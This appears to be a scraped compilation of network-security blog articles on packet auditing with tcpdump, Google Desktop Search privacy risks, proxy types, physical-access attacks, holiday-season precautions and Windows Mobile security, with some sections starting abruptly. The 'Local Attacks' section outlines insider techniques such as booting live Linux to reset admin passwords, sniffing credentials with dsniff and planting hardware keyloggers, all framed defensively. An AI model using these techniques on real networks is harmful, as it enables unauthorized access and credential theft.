Consideration of the facts makes it obvious that having the code available has both advantages and disadvantages in terms of security. Vulnerabilities may be found – and exploited, if they’re found by the wrong people – more easily, but they may also be fixed – if they’re found by the right people – more quickly. There are many factors that affect the security of an operating system or application, from the code level to the user level. Whether or not the source code is open is probably one of the least important factors.
How to Audit your Network via Packet Analysis
Many of us do not give much thought to just what is traversing the corporate network. That is largely a job for the company's system administrator. The thing of it is though the sys admin quite often does not look at the packets themselves, as they go about their business of administering the network. About the only time they do look at actual packets is if there is a network problem, and they feel it must lie at the protocol level ie: packet level. With that in mind the fact is that there are untold riches lying in that great mass of packets flying around on your network.
Why should I audit though?
What are the concerns that we as computer network professionals worry about in today's computing environment? Well for one spyware infiltrating the corporate LAN is certainly of concern. Spyware is quickly becoming more and more virulent as time marches on. Dealing with this pest is quickly gaining front stage. The recent release of new Internet Explorer vulnerabilities has also raised concerns of possible network breaches. There is also the stealthy threat of Trojans, and the ever-present virus. What do most of these things have in common? They will all "dial home" if you will. Once installed on a user's computer they will in some shape, or form send data back to someone. That will result in packet flows out through your border gateway. With the creative use of bpf filters, and bitmasks these traffic flows can be found. There will be more to follow on this a little later on in this article.
A corporate LAN has a chokepoint through which all traffic must flow both in, and out of. This would be the edge router, border gateway, or another term that some of you may know it by. Behind this router is normally the main switch, which in turn sometimes has a variety of secondary switches hanging off of it. This type of setup is common today, and has some nice features that we can take advantage of. Just like I mentioned above this chokepoint allows us to see all traffic coming in and out of our network. Bearing this in mind we can tap into this setup, and then be able to monitor all of the traffic going both in and out of the network in the following manner.
How do you do it?
What we would want to do is plug a hub into the span port of the main switch so that we can have the ability to see all of the network activity as it exits, and enters our network.
After we have plugged our hub into the switch we would then in turn plug whatever we like into the hub itself. This could consist of an intrusion detection system, or a computer used for packet collection and storage. In essence you could plug whatever you like at this tap point. This setup is ideal, and of great help to monitor the health of your network.
There are many different ways to analyze traffic at the packet level. The one I personally espouse is tcpdump with the addition of bitmasks to it. To many this analysis method is not user friendly, and they therefore prefer using a gui front end like Ethereal. All of the tools that do packet analysis for you are good, but I would advise you to simply use tcpdump, and bit masks until you master their usage. Simply put using the mentioned command line tools will help keep your skills sharp, and keep you used to seeing the packets in their native state. After all we want to be able to know what is going with our network via packet inspection. To stay sharp you need to continually exercise your packet reading abilities, and that means not using a gui! There are very few things you can't do in tcpdump that Ethereal can do. Should you become too dependent on a tool like Ethereal, your skill could degrade.
Taking inventory
Now, to return to our mission of auditing our network, we must first take an inventory of the services the network offers. Does the corporate network have a web server, ftp server, web mail, and what type if any of database is used? Is file sharing enabled? All of these questions must be answered. Once this is done you will have properly base lined your network services, and know what should be present on the LAN. All that remains traffic wise is therefore technically suspect. This is a structured, and logical approach to take. It will also help to save you some time while combing through the traffic that you have collected.
So we now come back to actually using tcpdump, and bitmasks to see what is going on. Well pretty much all services, which are known (HTTP, SMTP POP3,…) operate on the ports below 1024. There are some services though that operate above this range such as SQL, which is on port 1433. The vast majority of known services run below 1024 though. Knowing this gives us a starting point to run some simple filters looking for specific activity.
Currently one of the main threats to the corporate LAN is peer-to-peer software that many employees have running on their workstations. It just so happens though that the majority of these P2P applications run on ephemeral ports. An ephemeral port is one that starts from 1025 and goes up to 65535. With this little nugget of information in mind we could design a bpf filter with a bitmask looking for any outbound connection attempts on a range of ports from say 1025 on up. That would allow us to see if there are some P2P running on the network. Even though the workstations in your company sit behind a router, and probably a firewall you can still be the unwitting "victim" of P2P software. All a user has to do is start this file sharing software up, and start a search for a file they want. Once found they then download it. The problem with P2P shared files is that they are often infected with various malware. So your otherwise secure network has now quite possibly been compromised from within.
Writing up a filter with the criteria (looking for connections on the ephemeral port range) noted above will easily pick out the packets in question if they are present. Though this requires that you log all packets coming, and out of your network. Logging all packets traversing your network is not as daunting a task as you may think it is. Many companies simply log all packets for an hour, and then compress the contents for later inspection if required. This is done to conserve disk space.
If we follow the same parameters that I described for a peer-to-peer application, and how to detect it then we can easily amend it to look for other types of undesirable traffic. Spyware depending on the type will act much in the same way, and can therefore be detected using the same methods. Conversely if you think that you may have been compromised, and want to look at the known port range (port 0 to 1024) for activity other than offered services you can still use a bpf filter to do so. It is only slightly more involved to design, but you can simply exclude known services and check the known port range for activity.
A side benefit of doing network auditing this way is that it reinforces your knowledge of TCP/IP, and specifically the core protocols themselves; TCP, UDP, IP, and ICMP. The greater your knowledge of the TCP/IP protocol suite the better you will be able to leverage this investigatory technique. So we now know that auditing our networks at a packet level is not only very much possible, but I would say definitely desirable.
For some more information about filtering IDS packets:
http://www.onlamp.com/pub/a/security/2004/06/17/ids_filtering.html
The Security Risks Of Desktop Searches
We ended our call and I didn’t think much more about it until I started being bombarded with E-mails from people disputing my statement about a 35 GB practical limit to the Exchange information store. It seemed that everyone (including the site’s editorial staff) wanted me to prove my statement. The problem was that I couldn’t seem to recall where I had read about the limitation. I could have read about it on the Microsoft Web site, or it could have been in one of the many E-mail based newsletters that I receive. The point is that I had no good way of searching for the information. I did eventually find a reference to the disputed statistic at: http://support.microsoft.com/default.aspx?scid=kb;en-us;823144 but this still wasn’t where I had originally found the information.
The reason why I am telling you about all of this is because Google and several other companies want to solve this particular problem. The idea is that you should be able to search your own computer just as easily as you search the Internet. There are several utilities available that will allow you to search your own computer (including a crude search tool built into Windows), but Google has recently released its own desktop search program.
Before you can really understand the risks associated with Google’s Desktop Search, you need to know a little bit about how it works. Google Desktop Search is what you might call a distributed application. Part of the application gets installed onto your own computer, while part of it runs off of Google’s Web site. The idea behind coding the application in this manner is that you can visit Google and search either the Internet or your own PC through a single interface.
After installing Google Desktop Search, an index is made of the contents of your PC. Included in the index are E-mail messages contained in Outlook and Outlook Express (messages in the Deleted Items folder are not indexed, nor are notes, contacts, journal entries, or to do lists). The software also indexes Microsoft Word, Excel, and PowerPoint files, as well as plain text and AOL Instant Messenger chats.
More interestingly though is the way that the software’s index is updated and the way that documents are cached. The Google Desktop Search works similarly in that it caches at least one copy of anything that gets indexed. The caching is intended as a time saver because it allows you to preview a document without actually having to open it. The other thing that the caching feature allows you to do is to maintain a document history. For example, suppose that you accidentally modified a spreadsheet incorrectly. If you needed to get the original data back, you could open a cached copy from a date prior to the modification. The data would probably look rather funky because it is being displayed outside of Excel, but it can help you rebuild your document.
Documents aren’t the only thing that Google Desktop Search caches. Any time that you receive an E-mail or visit a Web page, the information is automatically cached. This allows you to view previous versions of rapidly changing Web pages. For example, if you wanted to see what MSN’s headline was yesterday, you could just look at a cached copy.
As you can see, Google Desktop Search can index a wealth of information and place it all at your fingertips for easy access. The problem is that a major security hole has already been discovered.
The security hole (which has supposedly been fixed) was based on the fact that part of Google Desktop Search was Web based. A recent study at Rice University analyzed packets as they were transmitted between Google and a machine running Google Desktop Search. It was soon determined to be fairly easy to spoof such packets and trick a machine into delivering desktop search results to a remote machine over the Internet.
To prove the concept, Rice University developed a Java applet that could theoretically be run on a malicious Web site. If someone who was running Google Desktop Search were lured to the Web site, the site’s owner would be able to collect enough information to be able to remotely search the victim’s computer.
Although Google claims to have fixed the problem, this particular security hole could have proved disastrous. Imagine the consequences if someone with malicious intent were able to remotely search your hard disk. Even if you didn’t have any sensitive documents on your hard disk or any confidential E-mail messages, the cache contains a full history of all of the Web sites that you have visited.
At first, someone being able to search your Web history probably sounds harmless. Sure, it could be a little embarrassing if you are in the habit of visiting a lot of adult Web sites, but that’s the worst that can happen, right? Wrong!
Any time that you shop online, check your bank account, or log into a site requiring a membership, the transmission of anything sensitive is usually encrypted with SSL. The problem is that although SSL encryption is enabled, the encrypted Web page is displayed in its decrypted format when you look it. This is what Google Desktop Search caches. In other words, Google Desktop Search can cache any Web page, even if it was originally SSL encrypted. This means that if someone can query your local machine, they can gain full access to such pages.
OK, so there have been some security issues with Google’s Desktop Search software, but Google has supposedly fixed all of those issues, so what’s the problem? The problem is that the security holes which have already been demonstrated raise future concerns for privacy. Especially when you consider that other companies are working on similar products.
At the risk of sounding paranoid, I want to take a moment and discuss some of the future risks that I perceive with this type of indexing. Surely, no one would dispute that Spyware has become a huge problem over the last couple of years. Spyware modules exist that are able to log keystrokes and send them to a database somewhere on the Internet. There are also spyware modules that are able to manipulate Internet Explorer or other operating system files.
I’m not picking on Google because there are several companies that are currently developing similar global desktop search products. However, it stands to reason that sooner or later, one of those search products will become dominant, just as Google has become the dominant search engine for the Internet. Once that happens, and the indexing program becomes wide spread, I think that it will only be a matter of time before someone figures out how to read the contents. If someone can create a spyware module that can read this database, and is then able to infect a large number of computers with the module, then the person who created the spyware module could theoretically search millions of PCs simultaneously.
Sure, the person who is doing the search would have to have a specific thing that they were searching for, but there are all kinds of useful things that a hacker could search for. For example, Google allows you to search a number range. Several months ago, it was possible to search a range of 16 digit numbers, starting with the first four digits of your Visa card number and steal credit card numbers through the search engine. While Google has taken steps to remove that vulnerability, it may be possible to perform that type of search against your own local machine; or against someone else’s local machine.
What is Proxy?
and that request is in turn relayed to the proxy server. The server will check to see if it has a cached version of this page and if not it will then go get it and relay it back to the workstation in question.
The nuts and bolts of it
If the above noted scenario still doesn’t make a whole lot of sense to you then think of it this way. Having such a proxy server will, for one, speed up the browsing experience for a corporate user. It is much faster to serve up a cached page then it is to retrieve it every time. When the proxy server or, in this case, the caching proxy receives a page request it will, as mentioned, check to see if it already has it. It will also see if the cached page has expired or not. Should the validity of the resource requested have expired then it will go and get a new copy of that resource. That alone makes it worth having a proxy server on a network. There are many other advantages to having one though. Those advantages very much impact the security posture of a corporate network as well, hence the prevalent usage of them. One of the most obvious advantages is being able to centralize all web page requests in one location. This will establish a chokepoint that can be exploited for security purposes.
The transparent proxy
Just as I mentioned above, having the ability to have all client requests go through a single computer gives one the ability to monitor client usage. By client I mean a corporate workstation. This centralization is done by configuring the client browser to use the transparent proxy server’s address. Though this definition of a transparent proxy is a popular one it is also incorrect. In reality a transparent proxy is a combination of proxy server and NAT technology. In essence client connections are NAT’d (network address translation) so that they can be routed to the transparent proxy. Having this type of setup is also a major pain, I am told, to implement and maintain.
The reverse proxy
What the devil is a reverse proxy you ask!? Good question indeed. Typically a reverse proxy is installed in close proximity to one, or several web servers. What in actuality happens is that the reverse proxy itself is the point of first contact for all traffic being directed at the web servers. Why go through the bother of this though? Well for several reasons actually. One of the primary ones is for security purposes as this reverse proxy is a first layer and acts as a buffer for the web servers themselves. Another reason is for SSL connections. Encryption is a computer intensive task and having it performed on the reverse proxy vice, the actual web server makes sense in terms of performance. Were the web servers themselves handling both the encryption part as well as the actual web server part then that machine would quickly become rather slow. For that reason the reverse proxy is equipped to handle the SSL connections and normally has some type of acceleration hardware installed on it for this very purpose.
Another key reason that the reverse proxy is employed is for load balancing. Think of a popular website that has a lot of visitors at any given time. It makes sense that there would be multiple web servers there to handle all incoming page requests. With a reverse proxy in front of these back end web servers no one box gets crushed but rather the load is balanced across all web servers. This certainly helps for overall performance. Another feature of the reverse proxy is the ability to cache certain content in an effort to further take a load off of the web servers. Lastly, the reverse proxy can also handle any compression duties that are required. All in all there is a tremendous amount of work being done by the reverse proxy.
Split proxies
Just when you think you’re done there is always something else! In this case that would be the split proxy. Well much as its name infers, the split proxy is simply a couple of proxies that are installed over a couple of computers. It’s that simple really. Although this type of proxy configuration is one that I have never come across, I have heard of them being used. One of its main selling points is the ability to compress data and that is a boon when slow networks are involved.
Wrap up
Over the course of this article we have seen the various types of proxies in use today in many corporate network environments. As we have seen many of them are used for specific reasons. There is not really one proxy type that can do it all, hence the variety of them. One of the greatest abilities of the proxy is to help enforce an acceptable usage policy on a corporate network. All too often we hear about someone who was fired for inappropriate use of company computer assets. What that neat use of the English language means is that someone was likely surfing for pornography from work and on company time no less in all likelihood. Even though someone doing this is acting foolishly and deserves to be terminated there are other reasons as well to control and monitor employee Internet usage. You can imagine for example how well it would go over for a high profile, publicly traded company to have an employee caught downloading kiddie porn. If that type of news hits the media all of sudden your company stock price could take a nose dive. Having a proxy in place within a corporate setting is really not only common sense, but also a necessity in reality. While most company employees are hard working and above board there will always be one or two who are not. Having the ability to catch and deal with them quickly is very much desired
Local Attacks
gRemote code execution is a statement that always gets a lot of press and attention from computer security professionals. Remotely compromising a computer is not the only threat posed to a network. What about a local attack carried out by a trusted, or otherwise, individual?
Local attacks
We are becoming pretty much used to reading about new remote code execution exploits associated with various programs and operating systems. It is normally the goal of any hacker to obtain a means of executing their own code on the victim computer. This is a rather obvious goal really for why else would you attack a computer if not for the end state of being able to control it in some way. This also does affect exploits which will result in a denial of service condition. Though a denial of service is generally regarded by most as less critical then having an exploit, which results in remote code execution.
What do remote code execution and a denial of service attack have in common though? Well normally they are linked with someone attacking you remotely i.e. they are not in the same physical space as you. This is not the only means of attacking a computer though. There is also the ever present threat of the trusted employee. I won’t bother regurgitating the statistics, but it seems many groups and federal agencies believe that half of all computer breaches result from the acts of a trusted insider. That is indeed a high number and is probably open to debate. One thing that can be taken for granted though is that there are attacks mounted by those with physical access to a computer network.
Let’s put it into perspective
With the above said just what kind of attack is likely to see if a person with malicious intent has physical access to a computer on a network? To answer that really depends on the security put in place for that computer network. Typically there is really very little security in place on most computers in a corporate network. So I shall just go ahead and list some attacks that can take place.
First off an attacker sees that the computer is prompting them for the usual username and password combination. What does the attacker do? Well they can simply drop in their favorite live Linux distro or other such tool. Once they have recycled the power of the computer it will boot off the media and the admin password is changed shortly thereafter. Once the attacker has system administrator credentials there is potential for all kinds of nastiness.
Though the intent of the attacker may not necessarily be to log on as the sys admin, once again the allure of using a live Linux distro is very compelling. These tools contain a treasure trove of attack tools waiting to be invoked once the computer has booted off of it. Now the attacker can go about trying to do privilege escalation by sniffing the traffic on the network and hopefully snarf some passwords. The attacker could also be on the lookout for emails that are flying about the network. There is often rather sensitive data contained in corporate emails.
Another vital area of a computer network that can also be exploited via a live Linux distro are the SNMP messages flying about the network. There is an incredible amount of information available via these SNMP exchanges. You can gauge the uptimes of various servers for one. That type of server information is key in determining whether or not a server has been patched for a specific exploit or not. Seen below is an example of an SNMP packet as seen “on the wire”.
The bolded and underlined parts of the packet reflect the OID’s or object identifiers. It is these OID’s that convey specific system information for a device such as say an IIS. The below noted OID’s could be one that reflects the IIS servers uptime, server load, or NIC card throughput. It is by decoding these OID’s that you can glean critical information about a network. That said you would ideally have the software to do it with. Ethereal will do a pretty good job of decoding them, but you would preferably have the actual s/w used to send them in order to decrypt them. An example would be say WhatsupGold, or other management software.
01:31:26.631025 192.168.1.200.161 > 192.168.1.100.40274: { SNMPv1 C=testnet-pub { GetResponse(90) R=1546751089.1.3.6.1.2.1.2.2.1.10.24=3936973547 .1.3.6.1.2.1.2.2.1.16.24=3178 267035 .1.3.6.1.2.1.1.3.0=4268685032 .1.3.6.1.2.1.1.5.0="G"} } (ttl 255, id41656, len 148)
0x0000 4500 0094 a2b8 0000 ff11 151c c0a8 01c8 E...............
0x0010 c0a8 0164 00a1 9d52 0080 3f43 3076 0201 ........R..?C0v..
0x0020 0123 0123 0123 6574 2d70 7562 a266 0204 ..testnet-pub.f..
0x0030 5c31 8c71 0201 0002 0100 3058 3013 060a \1.q......0X0...
0x0040 2b06 0102 0102 0201 0a18 4105 00ea a972 +.........A....r
0x0050 eb30 1306 0a2b 0601 0201 0202 0110 1841 ..0...+.........A
0x0060 0500 bd70 819b 3011 0608 2b06 0102 0101 ....p..0...+.....
0x0070 0300 4305 00fe 6ef6 e830 1906 082b 0601 ...C...n..0...+..
0x0080 0201 0105 0004 0d47 .......G
So we have seen that physical access to a computer can be disastrous should an attacker boot off of a cd such as the one described above. There is not only that though. The same attack can be done via USB drives as well. These portable devices have gained in popularity and storage size. You can easily fit a Linux distribution on one of these devices. Restricting access to USB drives and booting off of cd-drives needs to be restricted. This can be done with relative ease and can be read about here.
Beyond live CD’s and USB sticks
Well when it comes to local attacks pulled off due to physical access there is more to it than the aforementioned. One of the craftier ones that I have seen is the hardware keylogger. Think about this now, and any system administrators that may also be reading this, just how often do you actually visually inspect system components like the keyboard and mouse? Odds are that you check them rarely if at all. This is why a hardware keylogger is so effective. You simply need to attach it and walk away from it. It will rarely if ever be detected. After all it leaves no footprint on the affected computer, nor will anti-virus software detect it. Rather ideal if you ask me. Once you are physically in a network it would take mere seconds to install this.
Along the lines of the Live linux distros mentioned above is a suite of tools that have been porter to the world of win32. The dsniff suite is a very powerful one indeed. Built into this toolset is the ability to intercept emails, see sites being surfed to, and also do packet sniffing to get those much desired passwords. The only caveat for use of this tool is the need for winpcap to be installed. That though can be easily and quickly done by an attacker.
Of Trojans and LSP’s
Having physical access to a computer also gives one the ability to install trojans, and the stealthy LSP trojan i.e. layered service provider. Both of these malware specimens can be written so that they evade detection by all anti-virus vendors’ signatures. That would infer that someone with programming ability has written custom code. This is not as far fetched as you would think. It happens all the time in the world of corporate espionage. I hope you will read the last hyperlink I just provided, as it will certainly sink home the fact that corporate espionage does happen. It is a heck of a lot cheaper to pay some programmer a five figure sum of money, which in turn will allow you to gain say untold millions in terms of corporate research. That math is not difficult to figure out.
The wrap up
While I have only listed some of the physical attacks that a computer could fall prey to there are many others. There are also variations of the ones listed as well. All you can do is tighten down your network as best you can, and that includes leveraging the power of GPO’s, restricting physical access to your computer resources and other preventative measures. Each network will have its own quirks. You must sit down and give your security needs some sober thought. Once you have charted out your weaknesses, you will be well on your way to securing them. Please remember that not all attacks are done remotely. There will always be the ever present threat of attacks performed by those with physical access. I sincerely hope that this article was of interest to you, and as always I welcome your feedback. Till next time!
Issues to look out for during the holiday season
During the Christmas period, companies are at higher risk of having one or more employees copy copyrighted material onto their network. This can be for a number of factors. Employees will figure that security will be more lax, with the possibility of multiple administrators on holiday thus risking more than usual, figuring they can get away with copying or downloading illegal material without getting caught.
During Christmas time a lot of people buy presents for each other. In the tech industry especially, but even in any other industry it is likely that a good deal of these presents will be some kind of electronic gadgets. Gadgets that are likely to be able to copy and carry a good deal of data, such as mp3 players, portable video players, cameras, and portable storage. Eager to try these devices out, employees are likely to bring them to work with them.
Spamming and Social Engineering mails are also a possible source of piracy. Illegal software vendors might try selling illegal copies of software at low prices, portraying the low price as a big Christmas discount making the deal seem more legitimate.
Strong Passwords
Before leaving for Christmas holidays, it is essential to ensure that any computers which will be left running have strong passwords. During the Christmas holidays machines are more likely to suffer attacks.
Malicious persons will likely be on holiday as well, thus having more time on their hands to perform targeted attacks.
Attackers will figure that security is probably quite lax as administrators too go on holiday. This would be the perfect time to run brute force attacks which are not likely to be detected or acted upon until after the next year, plenty of time to cover tracks and set a stronghold on the hacked machine.
Administrators absence
As administrators take holidays there are numerous aspects that have to be considered and secured. The security of the network must still be handled efficiently, even with the decreased administrator to users ratio or even, in some cases, complete administrator absence.
Automatic updates. During the holiday season, viruses and Malware are more likely to be on the rise as virus writers take break from their respective work places and find themselves with more free time. Thus it is essential that, in the administrators absence, antiviruses continue running, scanning the network and updating themselves with the latest virus definition files.
As administrators are away from work, or a small percentage of administrators are left to cope with a large work load, systems must be in place to automatically monitor the network situation and alert administrators when things go wrong. During the holiday season it is essential that such tools support notifications not only through email system but also through mobile technologies such as SMS. This is crucial as email checking might suffer as people tend to be more socially active during this time of the year.
Company Shutdown
As companies shut down for the Christmas period, it is essential that not only the personnel go on shutdown but also the non essential services.
Wireless is one such service that, unless it is really needed during a company shutdown, it should be switched off. Wireless is a favorite attack vector as it gives a direct opportunity to gain access to the internal network infrastructure without having to physically break into the company building itself. As an example, the technology allows an attacker to park his car next to the company building and use wireless technology and software to sniff out communication packets, and possibly also use weak passwords to gain access to the operating environments susceptible to man-in-the-middle attacks like shares, unpatched operating systems and more. When not needed, especially during a Christmas shutdown, wireless should strictly be turned off.
Further to Wireless, any service and servers which are not required during the Christmas shutdown should also be disabled if they are not going to be used. This will ensure that, if the organization is targeted, hackers will have the minimum number of attack vectors available to them.
Ref: http://www.eimagazine.com/xq/asp/sid.0/articleid.A2E3D650-5469-4DAD-9C7F-BC3739D836B4/qx/display.htm
Physical Security
During the Christmas period, generally one would find less people at work places because most people would be enjoying Christmas holidays. Such a situation might lead insiders with bad intent to try to access restricted information, feel safer and might consider acting on it during this low period. Thus it is imperative to ensure critical servers which have crucial information are physically secure. Administrators should ensure server rooms are securely locked before leaving for holidays. Same goes for network switches, wireless equipment and any other device which might provide an entry point to secure networks.
Administrator computers should be considered as critical computers which also need to be physically secure just like servers. Furthermore, hard disk content should be encrypted. If hard disk content is left unencrypted and the only security is relied upon the login procedure, people with ill intend who have access to the administrator computer could easily extract the hard disk, connect it to another computer and possibly copy passwords or implant torjans and sniffers to allow easier future network penetration.
Windows Mobile 6.x security mechanisms
If the mobile devices on your network run Windows Mobile 6.x, they can benefit from the security mechanisms built in, which include the following:
- Password protection: Windows Mobile devices give you the option of using a simple 4 digit numerical PIN or an alphanumeric password up to 20 characters in length, which can be comprised of upper and lower case letters, numbers and symbols. The device should be set to lock after a reasonable period of time following power-down (you can set a Windows Mobile device for a password prompt after 0 minutes to 24 hours). You can even configure the local device-wipe feature to do a hard reset and remove all the user data if the wrong PIN or password is entered more than a specified number of times.
- Support for digital certificates: Windows Mobile can use digital certificates to control which applications are allowed to run based on the digital signature.
- Certificate based authentication: For better security, Windows Mobile supports authentication using Transport Layer Security (TLS) with an encryption key up to 2048 bits. Desktop Enrollment is performed by connecting the Windows Mobile device to a PC in the domain where the certificate server resides. The certificate is installed on the mobile device through the PC
- Local data encryption:
- You have even more control over mobile device security if your network runs Exchange Server 2007. Here’s how this combination can address the issues raised above:
- Password protection: With Windows Mobile 6, Local Authentication Plug-ins can be used to allow Exchange Server to enforce password policies such as length, strength and history. For example, if you allow 4 digit PINs, you can enable pattern recognition that will prevent users from using simple PINs such as “1234.” Or you can prevent the use of PINs and require passwords of a specified length and strength. You can set expiration periods for passwords and you can prohibit reusing previous passwords.
- Digital certificates: Windows Mobile can use digital certificates for network authentication, whereby the Exchange server checks the mobile device’s root certificate in order to create an SSL connection so that communications between the server and device are encrypted.
- Remote wipe: You can perform a remote wipe of the Windows Mobile device via Exchange synchronization or Outlook Web Access (OWA). All user data, keys and passwords and configuration settings are overwritten.
- Storage card protection: With Windows Mobile 6, you can encrypt the data on the storage card. When you do so, it can be read only on the device that encrypted it. This can be done via Exchange Server 2007 policies so that it can be controlled by the administrator, not left up to the user. Exchange Server 2007 can also perform a remote wipe of the storage card.
- Propagation of policies: Enterprise policies can be delivered to Windows Mobile devices when they synchronize with the Exchange server. Devices that do not comply with policies will not be allowed to synchronize with Exchange.
Microsoft’s System Center Mobile Device Manager can make it much easier to manage a large number of Windows Mobile 6.1 devices. It is integrated to work with Active Directory/Group Policy and can provide secure always-on VPN access from mobile devices. Administrators have control over the devices and can disable Bluetooth, Infrared, WLAN, POP/IMAP email and built-in cameras for better security. You can also enable full file encryption, track inventory data for all devices, and perform immediate remote wipes if a device is lost or stolen (without waiting for the device to sync with the server).
How to Change JKS KeyStore Private Key Password
Use following keytool command to change the key store password >keytool -storepasswd -new [new password ] -keystore [path to key stor...
-
AIX Environment Procedures The best way to approach this portion of the checklist is to do a comprehensive physical inventory of the server...
-
Java Keytool Commands for Creating and Importing keystore files: These commands allow you to generate a new Java Keytool keystore file, crea...